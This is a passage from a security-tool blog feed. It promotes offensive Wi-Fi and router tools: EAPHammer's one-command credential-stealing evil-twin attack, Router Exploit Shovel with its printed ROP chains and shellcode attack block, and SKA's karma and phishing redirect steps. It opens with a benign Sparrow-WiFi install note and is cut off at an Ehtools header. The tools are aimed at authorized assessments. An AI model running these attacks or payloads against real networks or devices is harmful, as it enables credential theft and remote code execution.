Raspbian Stretch now includes the correct version of Python, so no more custom python builds. The only thing that has to be custom handled is that PyQTChart is not in the apt repository or available via pip to build on raspbian. However, thanks to folks over at this thread: <a href="https://github.com/mu-editor/mu/issues/441" rel="nofollow" target="_blank" title="https://github.com/mu-editor/mu/issues/441">https://github.com/mu-editor/mu/issues/441</a>, I've been able to reproduce their pyqtchart build process on Raspbian Stretch. So to make everyone's life easier, there's now a script included with the project called rpi.setup_prerequisites.sh. Sudo that script first, then Sparrow "should" work for you. I tested it on a Pi 3B board with the 7" touchscreen and it works great.<br />
<br />
<b>Raspbian Jesse</b><br />
You can run the remote agent on a Raspberry pi, however the installation requirements are a bit different. First, Python3 did not include some of the subprocess module capabilities in the initial 3.x versions prior to 3.5. However they did put them back in from 3.5 forward. In terms of Raspian builds, Raspbian Squeeze only has Python 3.4.x in the repository. So the first step will be to download and build Python 3.5. However if you're running on Debian Stretch (the latest as of now), you can skip the 3.5 build. The repositories do have Python 3.5.<br />
You can use the following sequence to build python if you need to (you will need to apt-get install libsqlite3-dev prior to building Python since it's built in at compile time now):<br />
<pre><code>sudo apt-get install libsqlite3-dev
cd /tmp
wget https://www.python.org/ftp/python/3.5.5/Python-3.5.5.tgz
tar -zxvf Python-3.5.5.tgz
cd Python-3.5.5
./configure && make -j3 && sudo make install</code></pre>
Once that is done, install the necessary modules into the 3.5 build: sudo pip3.5 install gps3 dronekit manuf python-dateutil<br />
Then you can run the agent directly with commands like this:<br />
<pre><code>/usr/local/bin/python3.5 ./sparrowwifiagent.py
/usr/local/bin/python3.5 ./sparrowwifiagent.py --mavlinkgps=3dr --recordinterface=wlan0</code></pre>
Note that if you forget to specifically start them with 3.5 you will get an exception thrown since a subprocess function will be missing.<br />
Another important note about using dual band USB wireless adapters on the Raspberry Pi (tested on a Pi 3), is that as long as the internal wireless is enabled, Raspbian won't see the 5 GHz band.<br />
Add this line in your /boot/config.txt to disable the internal wireless, then your dual-band USB wireless will be able to see the 5 GHz band:<br />
<pre><code>dtoverlay=pi3-disable-wifi</code></pre>
The red and green LED's are also used on the Raspberry Pi to provide some visual feedback:<br />
<ol>
<li>Both lights off - Initializing</li>
<li>Red LED Heartbeat - gpsd found but unsynchronized (red light will stay off if gpsd is not installed or not running)</li>
<li>Red LED Solid - gpsd receiver synchronized</li>
<li>Green LED Solid - Agent HTTP server is up and the agent is operational and ready to serve requests</li>
</ol>
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/ghostop14/sparrow-wifi" rel="nofollow" target="_blank" title="Download Sparrow-Wifi">Download Sparrow-Wifi</a></span></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-56555248054753869862019-10-15T09:37:00.000-03:002019-10-15T09:37:03.533-03:00Eaphammer v1.9.0 - Targeted Evil Twin Attacks Against WPA2-Enterprise Networks<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-2_rMwc1KMBQ/XZ_486tRmuI/AAAAAAAAQkw/Xt2Niq-r-dQhbkx2D0qAvtL8o0npgjS6gCNcBGAsYHQ/s1600/eaphammer_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="341" data-original-width="928" height="234" src="https://1.bp.blogspot.com/-2_rMwc1KMBQ/XZ_486tRmuI/AAAAAAAAQkw/Xt2Niq-r-dQhbkx2D0qAvtL8o0npgjS6gCNcBGAsYHQ/s640/eaphammer_1.png" width="640" /></a></div>
<br />
by Gabriel Ryan (<a href="https://twitter.com/s0lst1c3" rel="nofollow" target="_blank" title="s0lst1c3">s0lst1c3</a>)(gryan[at]specterops.io)<br />
<br />
EAPHammer is a toolkit for performing targeted evil twin attacks against WPA2-Enterprise networks. It is designed to be used in full scope wireless assessments and red team engagements. As such, focus is placed on providing an easy-to-use interface that can be leveraged to execute powerful wireless attacks with minimal manual configuration. To illustrate just how fast this tool is, our Quick Start section provides an example of how to execute a credential stealing evil twin attack against a WPA/2-EAP network in just commands.<br />
<a name='more'></a><br />
<span style="font-size: x-large;"><b>Quick Start Guide (Kali)</b></span><br />
Begin by cloning the <strong>eaphammer</strong> repo using the following command:<br />
<pre><code>git clone https://github.com/s0lst1c3/eaphammer.git</code></pre>
Next run the kali-setup file as shown below to complete the eaphammer setup process. This will install dependencies and compile the project:<br />
<pre><code>./kali-setup</code></pre>
To setup and execute a credential stealing evil twin attack against a WPA/2-EAP network:<br />
<pre><code># generate certificates
./eaphammer --cert-wizard
# launch attack
./eaphammer -i wlan0 --channel 4 --auth wpa-eap --essid CorpWifi --creds</code></pre>
<br />
<span style="font-size: x-large;"><b>Usage and Setup Instructions</b></span><br />
For complete usage and setup instructions, please refer to the project's wiki page:<br />
<ul>
<li><a href="https://github.com/s0lst1c3/eaphammer/wiki" rel="nofollow" target="_blank" title="https://github.com/s0lst1c3/eaphammer/wiki">https://github.com/s0lst1c3/eaphammer/wiki</a></li>
</ul>
<br />
<span style="font-size: x-large;"><b>Features</b></span><br />
<ul>
<li>Steal RADIUS <a href="https://www.kitploit.com/search/label/Credentials" target="_blank" title="credentials">credentials</a> from WPA-EAP and WPA2-EAP networks.</li>
<li>Perform hostile portal attacks to steal AD creds and perform indirect wireless pivots</li>
<li>Perform <a href="https://www.kitploit.com/search/label/Captive%20Portal" target="_blank" title="captive portal">captive portal</a> attacks</li>
<li>Built-in Responder integration</li>
<li>Support for Open networks and WPA-EAP/WPA2-EAP</li>
<li>No manual configuration necessary for most attacks.</li>
<li>No manual configuration necessary for installation and setup process</li>
<li>Leverages latest version of hostapd (2.8)</li>
<li>Support for evil twin and karma attacks</li>
<li>Generate timed Powershell payloads for indirect wireless pivots</li>
<li>Integrated HTTP server for Hostile Portal attacks</li>
<li>Support for SSID cloaking</li>
<li>Fast and automated PMKID attacks against PSK networks using hcxtools</li>
<li>Password spraying across multiple usernames against a single ESSID</li>
</ul>
<br />
<span style="font-size: large;"><b>New (as of Version 1.7.0)(latest):</b></span><br />
EAPHammer now supports WPA/2-PSK along with WPA handshake captures.<br />
<br />
<span style="font-size: large;"><b>OWE (added as of Version 1.5.0):</b></span><br />
EAPHammer now supports rogue AP attacks against OWE and OWE-Transition mode networks.<br />
<br />
<span style="font-size: large;"><b>PMF (added as of Version 1.4.0)</b></span><br />
EAPHammer now supports 802.11w (Protected <a href="https://www.kitploit.com/search/label/Management" target="_blank" title="Management">Management</a> Frames), Loud Karma attacks, and Known Beacon attacks (documentation coming soon).<br />
<br />
<span style="font-size: large;"><b>GTC Downgrade Attacks</b></span><br />
EAPHammer will now automatically attempt a GTC Downgrade attack against connected clients in an attempt to capture plaintext credentials (see: <a href="https://www.youtube.com/watch?v=-uqTqJwTFyU&feature=youtu.be&t=22m34s" rel="nofollow" target="_blank" title="https://www.youtube.com/watch?v=-uqTqJwTFyU&feature=youtu.be&t=22m34s">https://www.youtube.com/watch?v=-uqTqJwTFyU&feature=youtu.be&t=22m34s</a>).<br />
<br />
<span style="font-size: large;"><b>Improved Certificate Handling</b></span><br />
EAPHammer's Cert Wizard has been expanded to provide users with the ability to create, import, and manage SSL <a href="https://www.kitploit.com/search/label/Certificates" target="_blank" title="certificates">certificates</a> in a highly flexible manner. Cert Wizard's previous functionality has been preserved as Cert Wizard's Interactive Mode, which uses the same syntax as previous versions. See <a href="https://github.com/s0lst1c3/eaphammer#xiii---cert-wizard" rel="nofollow" target="_blank" title="XIII - Cert Wizard">XIII - Cert Wizard</a> for additional details.<br />
<br />
<span style="font-size: large;"><b>TLS / SSL Backwards Compatibility</b></span><br />
EAPHammer now uses a local build of libssl that exists independently of the systemwide install. This local version is compiled with support for SSLv3, allowing EAPHammer to be used against legacy clients without compromising the integrity of the attacker's operating system.<br />
<br />
<span style="font-size: large;"><b>Supported EAP Methods</b></span><br />
EAPHammer supports the following EAP methods:<br />
<ul>
<li>EAP-PEAP/MSCHAPv2</li>
<li>EAP-PEAP/GTC</li>
<li>EAP-PEAP/MD5</li>
<li>EAP-TTLS/PAP</li>
<li>EAP-TTLS/MSCHAP</li>
<li>EAP-TTLS/MSCHAPv2</li>
<li>EAP-TTLS/MSCHAPv2 (no EAP)</li>
<li>EAP-TTLS/CHAP</li>
<li>EAP-TTLS/MD5</li>
<li>EAP-TTLS/GTC</li>
<li>EAP-MD5</li>
</ul>
<br />
<span style="font-size: large;"><b>802.11a and 802.11n Support</b></span><br />
EAPHammer now supports attacks against 802.11a and 802.11n networks. This includes the ability to create access points that support the following features:<br />
<ul>
<li>Both 2.4 GHz and 5 GHz channel support</li>
<li>Full MIMO support (multiple input, multiple output)</li>
<li>Frame aggregation</li>
<li>Support for 40 MHz channel widths using channel bonding</li>
<li>High Throughput Mode</li>
<li>Short Guard Interval (Short GI)</li>
<li>Modulation & coding scheme (MCS)</li>
<li>RIFS</li>
<li>HT power management</li>
</ul>
<br />
<span style="font-size: x-large;"><b>Upcoming Features</b></span><br />
<ul>
<li>Perform seamless MITM attacks with partial HSTS bypasses</li>
<li>directed rogue AP attacks (deauth then evil twin from PNL, deauth then karma + ACL)</li>
<li>Integrated website cloner for cloning captive portal login pages</li>
<li>Integrated HTTP server for captive portals</li>
</ul>
<br />
<span style="font-size: x-large;"><b>Contributing</b></span><br />
Contributions are encouraged and more than welcome. Please attempt to adhere to the provided issue and feature request templates.<br />
<br />
<span style="font-size: x-large;"><b>Versioning</b></span><br />
We use <a href="http://semver.org/" rel="nofollow" target="_blank" title="SemVer">SemVer</a> for versioning (or at least make an effort to). For the versions available, see <a href="https://github.com/s0lst1c3/eaphammer/releases" rel="nofollow" target="_blank" title="https://github.com/s0lst1c3/eaphammer/releases">https://github.com/s0lst1c3/eaphammer/releases</a>.<br />
<br />
<span style="font-size: x-large;"><b>License</b></span><br />
This project is licensed under the GNU Public License 3.0 - see the <a href="https://github.com/s0lst1c3/eaphammer/blob/master/LICENSE.md" rel="nofollow" target="_blank" title="LICENSE.md">LICENSE.md</a> file for details.<br />
<br />
<span style="font-size: x-large;"><b>Acknowledgments</b></span><br />
This tool either builds upon, is inspired by, or directly incorporates nearly fifteen years of prior research and development from the following awesome people:<br />
<ul>
<li>Brad Antoniewicz</li>
<li>Joshua Wright</li>
<li>Robin Wood</li>
<li>Dino Dai Zovi</li>
<li>Shane Macauly</li>
<li>Domanic White</li>
<li>Ian de Villiers</li>
<li>Michael Kruger</li>
<li>Moxie Marlinspike</li>
<li>David Hulton</li>
<li>Josh Hoover</li>
<li>James Snodgrass</li>
<li>Adam Toscher</li>
<li>George Chatzisofroniou</li>
<li>Mathy Vanhoef</li>
</ul>
For a complete description of what each of these people has contributed to the current wireless security landscape and this tool, please see:<br />
<ul>
<li><a href="https://github.com/s0lst1c3/eaphammer/wiki/Acknowledgements" rel="nofollow" target="_blank" title="https://github.com/s0lst1c3/eaphammer/wiki/Acknowledgements">https://github.com/s0lst1c3/eaphammer/wiki/Acknowledgements</a></li>
</ul>
EAPHammer leverages a modified version of <a href="https://github.com/opensecurityresearch/hostapd-wpe" rel="nofollow" target="_blank" title="hostapd-wpe">hostapd-wpe</a> (shoutout to <a href="https://github.com/brad-anton" rel="nofollow" target="_blank" title="Brad Anton">Brad Anton</a> for creating the original), <em>dnsmasq</em>, <a href="https://github.com/joswr1ght/asleap" rel="nofollow" target="_blank" title="asleap">asleap</a>, <a href="https://github.com/ZerBea/hcxtools" rel="nofollow" target="_blank" title="hcxpcaptool">hcxpcaptool</a> and <a href="https://github.com/ZerBea/hcxdumptool" rel="nofollow" target="_blank" title="hcxdumptool">hcxdumptool</a> for PMKID attacks, <a href="https://github.com/SpiderLabs/Responder" rel="nofollow" target="_blank" title="Responder">Responder</a>, and <em>Python 3.5+</em>.<br />
Finally, huge shoutout to the <a href="https://specterops.io/" rel="nofollow" target="_blank" title="SpecterOps">SpecterOps</a> crew for supporting this project and being a constant source of inspiration.<br />
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/s0lst1c3/eaphammer" rel="nofollow" target="_blank" title="Download Eaphammer">Download Eaphammer</a></span></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-10746863713975001512019-09-24T18:15:00.000-03:002019-09-24T18:15:04.373-03:00Router Exploit Shovel - Automated Application Generation For Stack Overflow Types On Wireless Routers<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-_FQH-PZZfpY/XYqHLxzo1BI/AAAAAAAAQZg/rMUxfSpzXAUswop0k_J8GjxHKqCiUs9IgCNcBGAsYHQ/s1600/Router-Exploit-Shovel_2_screenshot.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="809" data-original-width="1600" height="322" src="https://1.bp.blogspot.com/-_FQH-PZZfpY/XYqHLxzo1BI/AAAAAAAAQZg/rMUxfSpzXAUswop0k_J8GjxHKqCiUs9IgCNcBGAsYHQ/s640/Router-Exploit-Shovel_2_screenshot.png" width="640" /></a></div>
<br />
Automated Application Generation for Stack Overflow Types on <a href="https://www.kitploit.com/search/label/Wireless" target="_blank" title="Wireless">Wireless</a> Routers<br />
Router <a href="https://www.kitploit.com/search/label/Exploits" target="_blank" title="exploits">exploits</a> shovel is an automated application generation tool for stack overflow types on wireless routers. The tool implements the key functions of exploits, it can adapt to the length of the data padding on the stack, generate the ROP chain, generate the encoded shellcode, and finally assemble them into a complete attack code. The user only needs to attach the attack code to the overflow location of the POC to complete the Exploit of the remote code execution.<br />
The tool supports MIPSel and MIPSeb.Run on Ubuntu 16.04 64bit.<br />
<a name='more'></a><br />
<span style="font-size: large;"><b>Install</b></span><br />
Make sure you have git, python3 and setuptools installed. Download source code from our Github:<br />
<div>
<pre><code>$ git clone https://github.com/arthastang/Router-Exploit-Shovel.git</code></pre>
</div>
Set up environment and install dependencies:<br />
<div>
<pre><code>$ cd Router-Exploit-Shovel/
$ python3 setup.py install</code></pre>
</div>
<br />
<span style="font-size: large;"><b>Usage</b></span><br />
<div>
<pre><code>$ python3 Router_Exploit_Shovel.py -h
Usage: Router_Exploit_Shovel.py [options]
Options:
-h, --help show this help message and exit
-b BINARYFILEPATH, --binaryFile=BINARYFILEPATH
input binary file path
--ba=BINARYBASEADDR, --binaryBaseAddr=BINARYBASEADDR
input binary base address,default=0x00400000
-l LIBRARYFILEPATH, --libraryFile=LIBRARYFILEPATH
input libc file path
--la=LIBRARYBASEADDR, --libraryBaseAddr=LIBRARYBASEADDR
input library base address,default=0x2aae2000
-o OVERFLOWFUNCTIONPOINTOFFSET, --overflowPoint=OVERFLOWFUNCTIONPOINTOFFSET
input overflow function point offset
--arch=ARCH input architecture of elf files,[little] or
[big],default=big</code></pre>
</div>
For example:<br />
<div>
<pre><code>$ python3 Router_Exploit_Shovel.py -b test_binaries/mipseb-httpd -l test_binaries/libuClibc-0.9.30.so -o 0x00478584</code></pre>
</div>
<br />
<span style="font-size: large;"><b>Code structure</b></span><br />
<div>
<pre><code>--Router_Exploit_Shovel.py #Startup script
--databases/
|---ROP_patterns/ #YAML file of ROP patterns
|---shellcodes/ #YAML file of shellcodes
--example/ #Nday vulnerabilities, full report and exploit code
--results/
|---ROP_gadgets/ #ROP gadgets generating results
|---attackBlock.txt #Attack block generating results
--ropper/ #Modified ropper module to get all gadgets
--filebytes/ #Filebytes module to load ELFs
--router_exp_shovel/ #Main module
|---offset_calculator/ #Calculate padding size
|---ROP_maker/ #Make ROP chains
|---shellcode_maker/ #Make shellcodes
--qemuTestEnvironment/ #MIPS run-environment for router exploitation</code></pre>
</div>
<br />
<span style="font-size: large;"><b>ROP chain generation</b></span><br />
This tool uses pattern to generate ROP chains. Extract patterns from common ROP <a href="https://www.kitploit.com/search/label/Exploitation" target="_blank" title="exploitation">exploitation</a> procedure. Use regex matching to find available gadgets to fill up chain strings. Base64 encoding is to avoid duplicate character escapes. For example:<br />
<div>
<pre><code>chainString: (gadget2)(gadget1)BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB(sleep)CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC(call_code)DDDD(stack_gadget)\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44
gadget1: KC4qKW1vdmUgXCR0OVwsIFwkczE7IGx3IFwkcmFcLCAweDI0XChcJHNwXCk7IGx3IFwkczFcLCAweDIwXChcJHNwXCk7IGx3IFwkczBcLCAweDFjXChcJHNwXCk7KC4qKTsganIgXCR0OTsgYWRkaXUgXCRzcFwsIFwkc3BcLCAweDI4Ow==
#gadget1: (.*)move \\$t9\\, \\$s1; lw \\$ra\\, 0x24\\(\\$sp\\); lw \\$s1\\, 0x20\\(\\$sp\\); lw \\$s0\\, 0x1c\\(\\$sp\\);(.*); jr \\$t9; add iu \\$sp\\, \\$sp\\, 0x28;
gadget2: KC4qKWFkZGl1IFwkYTBcLCBcJHplcm9cLCAxOyBtb3ZlIFwkdDlcLCBcJHMxOyBqYWxyIFwkdDk7
#gadget2: (.*)addiu \\$a0\\, \\$zero\\, 1; move \\$t9\\, \\$s1; jalr \\$t9;
call_code: KC4qKW1vdmUgXCR0OVwsIFwkczI7IGphbHIgXCR0OTs=
#call_code: (.*)move \\$t9\\, \\$s2; jalr \\$t9;
stack_gadget: KC4qKWFkZGl1IFwkczJcLCBcJHNwXCwgMHgxODsoLiopbW92ZSBcJHQ5XCwgXCRzMDsgamFsciBcJHQ5Ow==
#stack_gadget: (.*)addiu \\$s2\\, \\$sp\\, 0x18;(.*)move \\$t9\\, \\$s0; jalr \\$t9;</code></pre>
</div>
<br />
<span style="font-size: large;"><b>Attackblocks</b></span><br />
You can get attackblocks generated in results/attackBlocks.txt. Such as:<br />
<div>
<pre><code>attackBlock = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x2a\xb3\x7c\x60\x2a\xb2\xbd\xfcBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB\x2a\xb3\x5c\xa0CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC\x2a\xb0\x09\x38DDDD\x2a\xaf\x76\x68\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x3c\x11\x99\x99\x36\x31\x99\x99\x27\xb2\x05\x4b\x22\x52\xfc\xa0\x8e\x4a\xfe\xf9\x02\x2a\x18\x26\xae\x43\xfe\xf9\x8e\x4a\xff\x4 1\x02\x2a\x18\x26\xae\x43\xff\x41\x8e\x4a\xff\x5d\x02\x2a\x18\x26\xae\x43\xff\x5d\x8e\x4a\xff\x71\x02\x2a\x18\x26\xae\x43\xff\x71\x8e\x4a\xff\x8d\x02\x2a\x18\x26\xae\x43\xff\x8d\x8e\x4a\xff\x99\x02\x2a\x18\x26\xae\x43\xff\x99\x8e\x4a\xff\xa5\x02\x2a\x18\x26\xae\x43\xff\xa5\x8e\x4a\xff\xad\x02\x2a\x18\x26\xae\x43\xff\xad\x8e\x4a\xff\xb9\x02\x2a\x18\x26\xae\x43\xff\xb9\x8e\x4a\xff\xc1\x02\x2a\x18\x26\xae\x43\xff\xc1\x24\x12\xff\xff\x24\x02\x10\x46\x24\x0f\x03\x08\x21\xef\xfc\xfc\xaf\xaf\xfb\xfe\xaf\xaf\xfb\xfa\x27\xa4\xfb\xfa\x01\x01\x01\x0c\x21\x8c\x11\x5c\x27\xbd\xff\xe0\x24\x0e\xff\xfd\x98\x59\xb9\xbe\x01\xc0\x28\x27\x28\x06\xff\xff\x24\x02\x10\x57\x01\x01\x01\x0c\x23\x39\x44\x44\x30\x50\xff\xff\x24\x0e\xff\xef\x01\xc0\x70\x27\x24\x0d\x7a\x69\x24\x0f\xfd\xff\x01\xe0\x78\x27\x01\xcf\x78\x04\x01\xaf\x68\x25\xaf\xad\xff\xe0\xaf\xa0\xff\xe4\xaf\xa0\xff\xe8\xaf\xa0\xff\xec\x9b\x89\xb9\xbc\x24\x0e\xff\xef\x01\xc0\x30\x27\x23\xa5\xff\xe0\x24\x02\x10\x49\x01\x01\x01\x0c\x24\x0f\x73\x50\x9b \x89\xb9\xbc\x24\x05\x01\x01\x24\x02\x10\x4e\x01\x01\x01\x0c\x24\x0f\x73\x50\x9b\x89\xb9\xbc\x28\x05\xff\xff\x28\x06\xff\xff\x24\x02\x10\x48\x01\x01\x01\x0c\x24\x0f\x73\x50\x30\x50\xff\xff\x9b\x89\xb9\xbc\x24\x0f\xff\xfd\x01\xe0\x28\x27\xbd\x9b\x96\x46\x01\x01\x01\x0c\x24\x0f\x73\x50\x9b\x89\xb9\xbc\x28\x05\x01\x01\xbd\x9b\x96\x46\x01\x01\x01\x0c\x24\x0f\x73\x50\x9b\x89\xb9\xbc\x28\x05\xff\xff\xbd\x9b\x96\x46\x01\x01\x01\x0c\x3c\x0f\x2f\x2f\x35\xef\x62\x69\xaf\xaf\xff\xec\x3c\x0e\x6e\x2f\x35\xce\x73\x68\xaf\xae\xff\xf0\xaf\xa0\xff\xf4\x27\xa4\xff\xec\xaf\xa4\xff\xf8\xaf\xa0\xff\xfc\x27\xa5\xff\xf8\x24\x02\x0f\xab\x01\x01\x01\x0c\x24\x02\x10\x46\x24\x0f\x03\x68\x21\xef\xfc\xfc\xaf\xaf\xfb\xfe\xaf\xaf\xfb\xfa\x27\xa4\xfb\xfe\x01\x01\x01\x0c\x21\x8c\x11\x5c"</code></pre>
</div>
<br />
<span style="font-size: large;"><b>Dependencies</b></span><br />
<ul>
<li>Ropper:An awesome tool for dumping binary informations and generating ROP chains.<a href="https://github.com/sashs/Ropper" rel="nofollow" target="_blank" title="https://github.com/sashs/Ropper">https://github.com/sashs/Ropper</a></li>
<li>filebytes:Library to read and edit files in ELF、PE、MachO and OAT.<a href="https://scoding.de/filebytes-introduction" rel="nofollow" target="_blank" title="https://scoding.de/filebytes-introduction">https://scoding.de/filebytes-introduction</a></li>
<li>yaml:YAML Ain't Markup Language.<a href="https://yaml.org/" rel="nofollow" target="_blank" title="https://yaml.org/">https://yaml.org/</a></li>
<li>optparse:Parser for <a href="https://www.kitploit.com/search/label/Command%20Line" target="_blank" title="command line">command line</a> options.<a href="https://docs.python.org/3/library/optparse.html" rel="nofollow" target="_blank" title="https://docs.python.org/3/library/optparse.html">https://docs.python.org/3/library/optparse.html</a></li>
<li>Capstone:disassembly framework.<a href="http://www.capstone-engine.org/" rel="nofollow" target="_blank" title="http://www.capstone-engine.org/">http://www.capstone-engine.org/</a></li>
<li>re:regex module.</li>
</ul>
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/arthastang/Router-Exploit-Shovel" rel="nofollow" target="_blank" title="Download Router-Exploit-Shovel">Download Router-Exploit-Shovel</a></span></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-22075689758802230812019-09-23T09:00:00.000-03:002019-09-23T09:00:02.590-03:00SKA - Simple Karma Attack<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-_fuhXy72X-k/XYAg6h2jqRI/AAAAAAAAQY0/Ao2rt028hsMwBuTQ4r4hdd23pon6mAt6gCNcBGAsYHQ/s1600/SKA_5_logo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="580" data-original-width="1600" height="232" src="https://1.bp.blogspot.com/-_fuhXy72X-k/XYAg6h2jqRI/AAAAAAAAQY0/Ao2rt028hsMwBuTQ4r4hdd23pon6mAt6gCNcBGAsYHQ/s640/SKA_5_logo.png" width="640" /></a></div>
<br />
SKA allows you to implement a very simple and fast <a href="https://en.wikipedia.org/wiki/KARMA_attack" rel="nofollow" target="_blank" title="karma">karma</a> attack.<br />
You can sniff probe requests to choice the fake AP name or, if you want, you could insert manually the name of the AP (<a href="https://en.wikipedia.org/wiki/Evil_twin_(wireless_networks)" rel="nofollow" target="_blank" title="evil twin attack">evil twin attack</a>).<br />
When the target has connected to your WLAN you could active the HTTP redirection and perform a MITM attack.<br />
<a name='more'></a><br />
<span style="font-size: x-large;"><b>Details</b></span><br />
The script implements these steps:<br />
<ol>
<li> selection of NICs for the attack (one for LAN and one for WAN)<br />
</li>
<li> capture of probe-requests to choice the fake AP name (<em><strong>tcpdump</strong></em>)<br />
</li>
<li> activation of fake AP (<em><strong>hostapd</strong></em> and <em><strong>dnsmasq</strong></em>)<br />
<ul>
<li>the new AP has a DHCP server which provides a valide IP to the target and prevents possible alerts on the victim devices</li>
</ul>
</li>
<li> activation of HTTP redirection (<em><strong>iptables</strong></em>)<br />
<ul>
<li>only HTTP requests are redirect to fake site, while the HTTPS traffic continues to route normally</li>
</ul>
</li>
<li> activation of <em><strong>Apache</strong></em> server for hosting the <a href="https://www.kitploit.com/search/label/Phising" target="_blank" title="phising">phising</a> site<br />
</li>
<li> at the end of the attack the script cleans all changes and restores Apache configuration<br />
</li>
</ol>
<br />
<span style="font-size: x-large;"><b>Screenshots</b></span><br />
<div align="center">
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-gifYLBjvvo0/XYAhBLvCw2I/AAAAAAAAQY4/C6HOe6RXlVsoXUQaE2WdcPwIYHVAQ2r9wCNcBGAsYHQ/s1600/SKA_6_complete_execution.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="559" data-original-width="988" height="362" src="https://1.bp.blogspot.com/-gifYLBjvvo0/XYAhBLvCw2I/AAAAAAAAQY4/C6HOe6RXlVsoXUQaE2WdcPwIYHVAQ2r9wCNcBGAsYHQ/s640/SKA_6_complete_execution.png" width="640" /></a></div>
</div>
Press CTRL-C to kill all processes and restore the configuration files. <br />
<br />
<div align="center">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-jmRjU-rTAIM/XYAhFXlv4OI/AAAAAAAAQY8/lgHvY2bmecAo3xv-v_AIa-Y8Aq1yXDCZwCNcBGAsYHQ/s1600/SKA_7_restoring_before_exit.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="199" data-original-width="421" src="https://1.bp.blogspot.com/-jmRjU-rTAIM/XYAhFXlv4OI/AAAAAAAAQY8/lgHvY2bmecAo3xv-v_AIa-Y8Aq1yXDCZwCNcBGAsYHQ/s1600/SKA_7_restoring_before_exit.png" /></a></div>
</div>
<span style="font-size: x-large;"><b>FAQ</b></span><br />
SKA alerts you if there are some problems with NetworkManager demon or Apache configuration file. Anyway you could find the answers to your problems in the links below:<br />
<ol>
<li> <a href="https://rootsh3ll.com/evil-twin-attack/" rel="nofollow" target="_blank" title="resolve Network Manager conflict 1">resolve Network Manager conflict 1</a><br />
section: "Resolve <a href="https://www.kitploit.com/search/label/Airmon-ng" target="_blank" title="airmon-ng">airmon-ng</a> and Network Manager Conflict"<br />
</li>
<li> <a href="https://github.com/sensepost/mana/issues/13" rel="nofollow" target="_blank" title="resolve Network Manager conflict 2">resolve Network Manager conflict 2</a><br />
</li>
<li> <a href="https://unix.stackexchange.com/questions/257274/how-to-disable-dnsmasq" rel="nofollow" target="_blank" title="disable dnsmasq">disable dnsmasq</a><br />
</li>
</ol>
<br />
<span style="font-size: large;"><b>In summary</b></span><br />
<ol>
<li> Disable DNS line in your NetworkManager configuration file (look into /etc/NetworkManager/):<br />
<code>#dns=dnsmasq</code><br />
</li>
<li> Insert the MAC of your <a href="https://www.kitploit.com/search/label/Wireless" target="_blank" title="wireless">wireless</a> adapter between the unmanaged devices to allow <em><strong>hostapd</strong></em> works properly:<br />
<code>unmanaged-devices=mac:XX:XX:XX:XX:XX:XX</code></li>
</ol>
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/Leviathan36/SKA" rel="nofollow" target="_blank" title="Download SKA">Download SKA</a></span></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-26321128671075952462019-09-03T09:00:00.000-04:002019-09-03T09:00:08.245-04:00Ehtools - Framework Of Serious Wi-Fi Penetration Tools<div class="separator" style="clear: both; text-align: center;">
